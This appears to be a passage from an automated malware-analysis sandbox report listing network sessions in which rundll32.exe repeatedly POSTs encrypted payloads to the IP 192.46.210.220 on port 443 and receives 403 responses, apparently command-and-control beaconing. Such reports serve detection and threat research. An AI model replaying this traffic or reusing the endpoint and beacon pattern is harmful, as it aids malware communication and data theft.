                                                                                                      2021-10-28 02:55:03 UTC110OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:04 UTC119INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.749840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:03 UTC114OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:03 UTC114OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:04 UTC119INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.749852192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:07 UTC119OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:07 UTC120OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:08 UTC129INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.749853192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:07 UTC124OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:07 UTC124OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:08 UTC129INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.749860192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:13 UTC129OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:13 UTC130OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:13 UTC139INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.749861192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:13 UTC134OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:13 UTC134OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:13 UTC139INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.749868192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:17 UTC139OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:17 UTC139OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:17 UTC149INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.749869192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:17 UTC144OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:17 UTC144OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:17 UTC149INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.749732192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:24 UTC14OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:24 UTC15OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:25 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.749876192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:20 UTC149OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:20 UTC149OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:21 UTC159INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.749877192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:20 UTC154OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:20 UTC154OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:21 UTC159INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.749884192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:24 UTC159OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:24 UTC159OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:25 UTC169INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.749885192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:24 UTC164OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:24 UTC164OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:25 UTC169INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.749892192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:28 UTC169OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
